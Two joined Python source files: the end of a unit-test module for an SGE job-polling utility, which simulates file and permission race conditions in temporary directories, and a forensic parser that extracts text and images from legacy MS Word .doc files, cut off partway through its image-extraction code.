sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
delete_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_finished_job_permission_removed_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (finished) is read permission removed after status is determined")
logger.info("-"*80)
def remove_read_permission_job_dir(*a, **kw):
"""
Remove read permission from job_dir
"""
logger.info("Job folder read permission removed ***********")
os.chmod(job_dir, 0o222)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
remove_read_permission_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Giving back permission for removal
os.chmod(job_dir, 0o777)
# Assert only if not on CI
if not running_on_ci:
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_README_deleted_before_getting_readme_info(self):
logger.info("-"*80)
logger.info("Test processing with README deleted before info is retrieved")
logger.info("-"*80)
def delete_README(*a, **kw):
"""
Delete README from job_dir
"""
logger.info("REAMDE deleted ***********")
os.remove(readme_filepath)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_job_info_from_readme",
delete_README):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_README_permission_removed_before_getting_readme_info(self):
logger.info("-"*80)
logger.info("Test processing with README read permission removed before info is retrieved")
logger.info("-"*80)
def remove_read_permission_README(*a, **kw):
"""
Remove read permission from job_dir
"""
logger.info("README read permission removed ***********")
os.chmod(readme_filepath, 0o222)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_job_info_from_readme",
remove_read_permission_README):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Giving back permission for removal
os.chmod(readme_filepath, 0o777)
# Assert only if not on CI
if not running_on_ci:
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
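# Note on the mechanism used throughout this class: before_after.before(
# "dotted.path", hook), from the `before_after` package, patches the callable
# at "dotted.path" so that `hook` runs immediately before each call to it.
# The tests exploit this to delete files, move directories, or drop
# permissions at a precise point inside
# start_job_creation_process_from_joblogfile, which simulates the SGE process
# racing against the poller.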
# -----------------------------------------------------------------------------
# Test Helper Function `is_recent`
# -----------------------------------------------------------------------------
class TestIsRecent(TestCase):
"""
Test the `is_recent` helper method of the `poll_jobs` script
"""
# -------------------------------------------------------------------------
def test_now(self):
datetime_obj = datetime.now()
self.assertTrue(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_24h_ago(self):
datetime_obj = datetime.now() - timedelta(hours=24)
# Testing true fails, because the now in the test is older than the now
# in the function.
# self.assertTrue(is_recent(datetime_obj))
# Therefore I need to test for false.
self.assertFalse(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_12h_ago(self):
datetime_obj = datetime.now() - timedelta(hours=12)
self.assertTrue(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_12h_in_future(self):
datetime_obj = datetime.now() + timedelta(hours=12)
self.assertTrue(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_365days_ago(self):
datetime_obj = datetime.now() - timedelta(days=365)
self.assertFalse(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_None(self):
datetime_obj = None
self.assertFalse(is_recent(datetime_obj))
# -------------------------------------------------------------------------
def test_string(self):
datetime_obj = "this is a string"
self.assertFalse(is_recent(datetime_obj))
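# A minimal sketch of `is_recent` that is consistent with the assertions above
# (hypothetical -- the real implementation lives in utils.jobinfo.poll): any
# non-datetime is not recent, and a datetime is recent when it is newer than
# 24 hours before "now" (which is why future datetimes pass).
#
# def is_recent(datetime_obj, max_age=timedelta(hours=24)):
#     if not isinstance(datetime_obj, datetime):
#         return False
#     return datetime_obj > datetime.now() - max_age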
# -----------------------------------------------------------------------------
# Test Helper Function `required_keys_avaiable`
# -----------------------------------------------------------------------------
class TestRequiredKeysAvailable(TestCase):
"""
Test the `required_keys_avaiable` helper method of the `poll_jobs` script
"""
# -------------------------------------------------------------------------
def test_dict_with_all_required_keys(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["main_name"] = "something"
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertTrue(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_base_runs(self):
"""Test dictionary with all required key available"""
readme_dict = {}
# readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_username(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
# readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_email(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
# readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_info_block(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
# readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_sub_date(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
# readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_solver(self):
"""Test dictionary with all required key available"""
readme_dict = {}
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
# readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
# -------------------------------------------------------------------------
def test_dict_with_missing_main_name(self):
"""Test dictionary with all required key available"""
readme_dict = {}
# readme_dict["main_name"] = "something"
readme_dict["base_runs"] = "something"
readme_dict["username"] = "something"
readme_dict["email"] = "something"
readme_dict["info_block"] = "something"
readme_dict["sub_date"] = "something"
readme_dict["solver"] = "something"
self.assertFalse(required_keys_avaiable(readme_dict))
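# A minimal sketch of `required_keys_avaiable` that is consistent with the
# assertions above (hypothetical -- the real implementation lives in
# utils.jobinfo.poll): the readme dict must contain every required key.
#
# REQUIRED_KEYS = {"main_name", "base_runs", "username", "email",
#                  "info_block", "sub_date", "solver"}
#
# def required_keys_avaiable(readme_dict):
#     return REQUIRED_KEYS.issubset(readme_dict)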
modules/DEFA/MS_Office/carpe_doc.py | naaya17/carpe | fa2e3cfebe20f8839c985e5b9b78b538800172a1 | ["Apache-2.0"] | 101,119 bytes | 56 stars (2019-02-07T06:21:45Z to 2022-03-21T08:19:24Z)
# carpe_doc.py
import os
import struct
import sys
import zlib
import compoundfiles
import olefile
class DOC:
def __init__(self, compound):
self.compound = compound
def __enter__(self):
raise NotImplementedError
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError
def parse_doc(self):
if self.compound.is_damaged == self.compound.CONST_DOCUMENT_NORMAL:
self.__parse_doc_normal__()
elif self.compound.is_damaged == self.compound.CONST_DOCUMENT_DAMAGED:
self.__parse_doc_damaged__()
def __doc_extra_filter__(self, string, uFilteredTextLen):
i = 0
j = 0
k = 0
textLen = uFilteredTextLen
# 1. Strip all whitespace characters from the beginning of the text
# 2. Collapse two or more consecutive blank characters into one
# 3. Collapse two or more consecutive newline characters into one
# 4. Filtering
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
uCaption = b'\x53\x00\x45\x00\x51\x00' # "SEQ" in UTF-16LE
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00'
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00' # "HYPERLINK"
uToc = b'\x54\x00\x4F\x00' # "TO" (prefix of "TOC")
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00' # "PAGEREF"
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00' # "INDEX"
uEnd = b'\x20\x00\x01\x00\x14\x00' # blank, 0x01 marker, field separator
uEnd2 = b'\x20\x00\x14\x00' # blank + field separator
uEnd3 = b'\x20\x00\x15\x00' # blank + field end
uEnd4 = b'\x14\x00' # field separator mark
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00' # field end mark
uHeader = b'\x13\x00' # field begin mark
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00' # "EMBED"
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00' # "SHAPE"
uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00' # "PAGE"
uDoc = b'\x44\x00\x4F\x00\x43\x00' # "DOC"
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00' # "STYLEREF"
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00' # "TITLE"
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00' # "IF DATE"
filteredText = string
while i < textLen :
if i == 0:
k = 0
while (filteredText[0:2] == uBlank or filteredText[0:2] == uBlank2 or
filteredText[0:2] == uNewline or filteredText[0:2] == uNewline2 or
filteredText[0:2] == uNewline3 or filteredText[0:2] == uNewline4):
filteredText = filteredText[:k] + filteredText[k + 2:]
textLen -= 2
if (len(filteredText) == 0):
break
if len(filteredText) == 0:
break
if (len(filteredText) >= 2 + i) and filteredText[i : i + 2] == uHeader:
filteredText = filteredText[:i] + filteredText[i + 2:]
textLen -= 2
if (len(filteredText) >= 2 + i) and filteredText[i : i + 2] == uBlank:
filteredText = filteredText[:i] + filteredText[i + 2:]
textLen -= 2
charSize = 0
temp = True
j = i
if (len(filteredText) >= 16 + i) and \
(filteredText[i: i + 6] == uCaption or filteredText[i: i + 18] == uHyperlink or
filteredText[i: i + 4] == uToc or filteredText[i: i + 14] == uPageref or filteredText[
i: i + 10] == uIndex or
filteredText[i: i + 10] == uChart or filteredText[i: i + 10] == uShape or filteredText[
i: i + 8] == uPage or
filteredText[i: i + 6] == uDoc or filteredText[i: i + 16] == uStyleref or filteredText[
i: i + 10] == uTitle or filteredText[
i: i + 14] == uDate):
pass
else:
temp = False
while temp == True:
if (len(filteredText) >= 6 + j) and (filteredText[j: j + 6] == uEnd):
charSize += 6
j += 6
break
elif (len(filteredText) >= 4 + j) and (
filteredText[j: j + 4] == uEnd2 or filteredText[j: j + 4] == uEnd3):
charSize += 4
j += 4
break
elif (len(filteredText) >= 2 + j) and (filteredText[j: j + 2] == uEnd4):
charSize += 2
j += 2
break
charSize += 2
j += 2
if (len(filteredText) < 6 + j):
temp = False
break
if temp == True:
filteredText = filteredText[:i] + filteredText[i + charSize:]
textLen -= charSize
i -= 2
continue
if (len(filteredText) >= 2 + i) and (
filteredText[i: i + 2] == uSection or filteredText[i: i + 2] == uSection6 or
filteredText[i: i + 2] == uSection9):
filteredText = filteredText[:i] + filteredText[i + 2:]
textLen -= 2
i -= 2
continue
if (len(filteredText) >= 4 + i) and (filteredText[i: i + 4] == uHeader):
filteredText = filteredText[:i] + filteredText[i + 4:]
textLen -= 4
i -= 4
continue
i += 2
result = {}  # avoid shadowing the builtin `dict`
result['string'] = filteredText
result['length'] = textLen
return result
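# The uXxx byte constants above are UTF-16LE encodings of Word field-code
# keywords, and 0x13/0x14/0x15 are the field begin/separator/end marks from
# the MS-DOC text stream. The keyword constants can be reproduced like this
# (illustrative helper, not used by the parser):
#
# def _utf16le(text):
#     return text.encode("utf-16-le")
#
# _utf16le("HYPERLINK") == uHyperlink   # True
# _utf16le("PAGEREF") == uPageref       # True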
def __parse_doc_normal__(self):
word_document = bytearray(self.compound.fp.open('WordDocument').read()) # byteWD
one_table = b''
zero_table = b''
try:
one_table = bytearray(self.compound.fp.open('1Table').read())
except compoundfiles.errors.CompoundFileNotFoundError:
pass
#print("1Table is not exist.")
try:
zero_table = bytearray(self.compound.fp.open('0Table').read())
except compoundfiles.errors.CompoundFileNotFoundError:
pass
#print("0Table is not exist.")
if len(one_table) == 0 and len(zero_table) == 0:
return self.compound.CONST_ERROR
# Extract doc Text
ccpText = b''
fcClx = b''
lcbClx = b''
aCP = b''
aPcd = b''
fcCompressed = b''
Clx = b''
byteTable = b''
ccpTextSize = 0
fcClxSize = 0
lcbClxSize = 0
ClxSize = 0
string = b''
CONST_FCFLAG = 1073741824 # 0x40000000
CONST_FCINDEXFLAG = 1073741823 # 0x3FFFFFFF
i = 0
j = 0
k = 0
# Check Encrypted
uc_temp = word_document[11]
uc_temp = uc_temp & 1
if uc_temp == 1:
return self.compound.CONST_ERROR
# 0Table 1Table
is0Table = word_document[11] & 2
if is0Table == 0:
byteTable = zero_table
else:
byteTable = one_table
# Get cppText in FibRgLw
ccpText = word_document[0x4C:0x50]
ccpTextSize = struct.unpack('<I', ccpText)[0]
if (ccpTextSize == 0):
return self.compound.CONST_ERROR
# Get fcClx in FibRgFcLcbBlob
fcClx = word_document[0x1A2:0x1A6]
fcClxSize = struct.unpack('<I', fcClx)[0]
if (fcClxSize == 0):
return self.compound.CONST_ERROR
# Get lcbClx in FibRgFcLcbBlob
lcbClx = word_document[0x1A6:0x1AA]
lcbClxSize = struct.unpack('<I', lcbClx)[0]
if (lcbClxSize == 0):
return self.compound.CONST_ERROR
# Get Clx
Clx = byteTable[fcClxSize: fcClxSize + lcbClxSize]
if Clx[0] == 0x01:
cbGrpprl = struct.unpack("<H", Clx[1:3])[0]
Clx = byteTable[fcClxSize + cbGrpprl + 3: (fcClxSize + cbGrpprl + 3) + lcbClxSize - cbGrpprl + 3]
if Clx[0] != 0x02:
return self.compound.CONST_ERROR
ClxSize = struct.unpack('<I', Clx[1:5])[0]
ClxIndex = 5
PcdCount = 0
aCPSize = []
fcFlag = 0
fcIndex = 0
fcSize = 0
encodingFlag = False
PcdCount = int(((ClxSize / 4) / 3)) + 1
for i in range(0, PcdCount):
aCp = Clx[ClxIndex:ClxIndex + 4]
aCPSize.append(struct.unpack('<I', aCp[0:4])[0])
ClxIndex += 4
PcdCount -= 1
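# Structure note (MS-DOC spec): the Pcdt payload parsed here is a PlcPcd, an
# array of (n + 1) 4-byte character positions (aCP) followed by n 8-byte Pcd
# entries. Bit 30 (0x40000000) of a Pcd's fc field marks the run as compressed
# 8-bit ANSI; otherwise the run is stored as 16-bit Unicode.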
### Filtering (same UTF-16LE field-code constants as in __doc_extra_filter__)
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
uCaption = b'\x53\x00\x45\x00\x51\x00'
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00'
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00'
uToc = b'\x54\x00\x4F\x00'
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00'
uEnd = b'\x20\x00\x01\x00\x14\x00'
uEnd2 = b'\x20\x00\x14\x00'
uEnd3 = b'\x20\x00\x15\x00'
uEnd4 = b'\x14\x00'
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00'
uHeader = b'\x13\x00'
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00'
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00'
uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00'
uDoc = b'\x44\x00\x4F\x00\x43\x00'
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00'
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00'
### Filtering targets: 0x0001 ~ 0x0017 (0x000A Line Feed skipped)
uTab = b'\x09\x00' # Horizontal Tab
uSpecial = 0xF0 # indexing a bytes object yields an int, so compare single bytes as ints
bFullScanA = False
bFullScanU = False # if the size info is invalid, then the entire range will be scanned.
tempPlus = 0
for i in range(0, PcdCount):
aPcd = Clx[ClxIndex:ClxIndex + 8]
fcCompressed = aPcd[2:6]
fcFlag = struct.unpack('<I', fcCompressed[0:4])[0]
if CONST_FCFLAG == (fcFlag & CONST_FCFLAG):
encodingFlag = True # 8-bit ANSI
else:
encodingFlag = False # 16-bit Unicode
fcIndex = fcFlag & CONST_FCINDEXFLAG
k = 0
if encodingFlag == True: # 8-bit ANSI
fcIndex = int(fcIndex / 2)
fcSize = aCPSize[i + 1] - aCPSize[i]
if len(word_document) < fcIndex + fcSize + 1:
if bFullScanA == False and len(word_document) > fcIndex:
fcSize = len(word_document) - fcIndex - 1
bFullScanA = True
else:
ClxIndex += 8
continue
ASCIIText = word_document[fcIndex:fcIndex + fcSize]
UNICODEText = b''
for n in range(0, len(ASCIIText)):  # do not reuse the outer loop index `i`
UNICODEText += bytes([ASCIIText[n]])
UNICODEText += b'\x00'
while k < len(UNICODEText):
if (UNICODEText[k: k + 2] == uSection2 or UNICODEText[k: k + 2] == uSection3 or UNICODEText[
k: k + 2] == uSection4 or
UNICODEText[k: k + 2] == uSection5 or UNICODEText[k: k + 2] == uSection7 or UNICODEText[
k: k + 2] == uSection8 or
UNICODEText[k + 1] == uSpecial or UNICODEText[k: k + 2] == uTrash):
k += 2 ### while
continue
if (UNICODEText[k: k + 2] == uNewline or UNICODEText[k: k + 2] == uNewline2 or UNICODEText[
k: k + 2] == uNewline3 or UNICODEText[
k: k + 2] == uNewline4):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uNewline or
UNICODEText[j:j + 2] == uNewline2 or UNICODEText[j:j + 2] == uNewline3 or UNICODEText[
j:j + 2] == uNewline4 or
UNICODEText[j:j + 2] == uTab or UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= len(UNICODEText):
break
elif (UNICODEText[k:k + 2] == uBlank or UNICODEText[k:k + 2] == uBlank2 or UNICODEText[
k:k + 2] == uTab):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uTab or
UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if (j >= len(UNICODEText)):
break
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
k += 2
elif encodingFlag == False: ### 16-bit Unicode
fcSize = 2 * (aCPSize[i + 1] - aCPSize[i])
if (len(
word_document) < fcIndex + fcSize + 1): # Invalid structure - size info is invalid (large) => scan from fcIndex to last
if (bFullScanU == False and len(word_document) > fcIndex):
fcSize = len(word_document) - fcIndex - 1
bFullScanU = True
else:
ClxIndex = ClxIndex + 8
continue
while k < fcSize:
pair = word_document[fcIndex + k: fcIndex + k + 2]
# uSpecial must be matched as a one-byte slice: indexing a bytes object
# yields an int, which never compares equal to b'\xF0'.
if pair in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uTrash) or word_document[fcIndex + k + 1:fcIndex + k + 2] == uSpecial:
k += 2
continue
if pair in (uNewline, uNewline2, uNewline3, uNewline4):
if word_document[fcIndex + k] == 0x0d:
string += b'\x0a' # normalize CR to LF
string += bytes([word_document[fcIndex + k + 1]])
else:
string += pair
j = k + 2
while j < fcSize:
nxt = word_document[fcIndex + j: fcIndex + j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uNewline, uNewline2, uNewline3, uNewline4, uTab) or word_document[fcIndex + j + 1:fcIndex + j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= fcSize:
break
elif pair in (uBlank, uBlank2, uTab):
string += pair
j = k + 2
while j < fcSize:
nxt = word_document[fcIndex + j: fcIndex + j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uTab) or word_document[fcIndex + j + 1:fcIndex + j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= fcSize:
break
string += word_document[fcIndex + k: fcIndex + k + 2]
k += 2
ClxIndex += 8
dictionary = self.__doc_extra_filter__(string, len(string))
filteredText = dictionary['string']
filteredLen = dictionary['length']
#self.compound.content = filteredText.decode("utf-16")
###### DOC: ensure a trailing newline terminator
if len(filteredText) != 0:
nPos = filteredLen
usTmp1 = 0
usTmp2 = 0
if nPos >= 4:
usTmp1 = struct.unpack('<H', filteredText[nPos - 4 : nPos - 2])[0]
usTmp2 = struct.unpack('<H', filteredText[nPos - 2 : nPos])[0]
# usTmp1/usTmp2 are ints, so compare with the numeric code unit 0x000A;
# the old "== uNewline" compared an int to bytes and was always False.
if usTmp1 == 0x000A:
if usTmp2 != 0x000A:
filteredText += b'\x0A\x00\x00\x00'
else:
if usTmp2 == 0x000A:
filteredText += b'\x0A\x00\x00\x00'
else:
filteredText += b'\x0A\x00\x0A\x00\x00\x00'
#######
for i in range(0, len(filteredText), 2):
try:
self.compound.content += filteredText[i:i+2].decode('utf-16')
except UnicodeDecodeError:
continue
##### Image #####
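# The Data stream stores OfficeArt BLIPs; the two magic sequences below
# are little-endian record headers for JPEG (recInstance 0x46A, recType
# 0xF01D) and PNG (recInstance 0x6E0, recType 0xF01E) pictures.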
try:
drawing_data = bytearray(self.compound.fp.open('Data').read())
drawing_offset = 0
img_num = 0
while drawing_offset < len(drawing_data):
if drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset) != -1: # -1 means "not found"; "> 0" missed a match at offset 0
#extension = ".jpg"
drawing_offset = drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset)
#drawing_offset = drawing_data.find(b'\x1D\xF0', drawing_offset)
elif drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset) != -1:
#extension = ".png"
drawing_offset = drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset)
#drawing_offset = drawing_data.find(b'\x1E\xF0', drawing_offset)
else:
break
embedded_blip_rh_ver_instance = struct.unpack('<H', drawing_data[drawing_offset: drawing_offset + 2])[0]
embedded_blip_rh_Type = struct.unpack('<H', drawing_data[drawing_offset + 2: drawing_offset + 4])[0]
embedded_blip_rh_recLen = struct.unpack('<I', drawing_data[drawing_offset + 4: drawing_offset + 8])[0]
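# OfficeArtRecordHeader: a recVer/recInstance word, a recType word, and a
# 4-byte recLen counting the bytes that remain in this BLIP record.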
drawing_offset += 0x08
embedded_size = embedded_blip_rh_recLen
embedded_blip_rgbUid1 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
embedded_blip_rgbUid2 = None
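# Some recInstance values (header >> 4, dropping the 4-bit recVer)
# indicate that a second 16-byte UID precedes the picture bytes.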
if int(embedded_blip_rh_ver_instance / 0x10) == 0x46B or int(
embedded_blip_rh_ver_instance / 0x10) == 0x6E3:
embedded_blip_rgbUid2 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
if embedded_blip_rh_Type != 0xF01A and embedded_blip_rh_Type != 0xF01B and embedded_blip_rh_Type != 0xF01C and \
embedded_blip_rh_Type != 0xF01D and embedded_blip_rh_Type != 0xF01E and embedded_blip_rh_Type != 0xF01F and \
embedded_blip_rh_Type != 0xF029:
break
extension = ""
if embedded_blip_rh_Type == 0xF01A:
extension = ".emf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01B:
extension = ".wmf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01C:
extension = ".pict"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01D:
extension = ".jpg"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01E:
extension = ".png"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01F:
extension = ".dib"
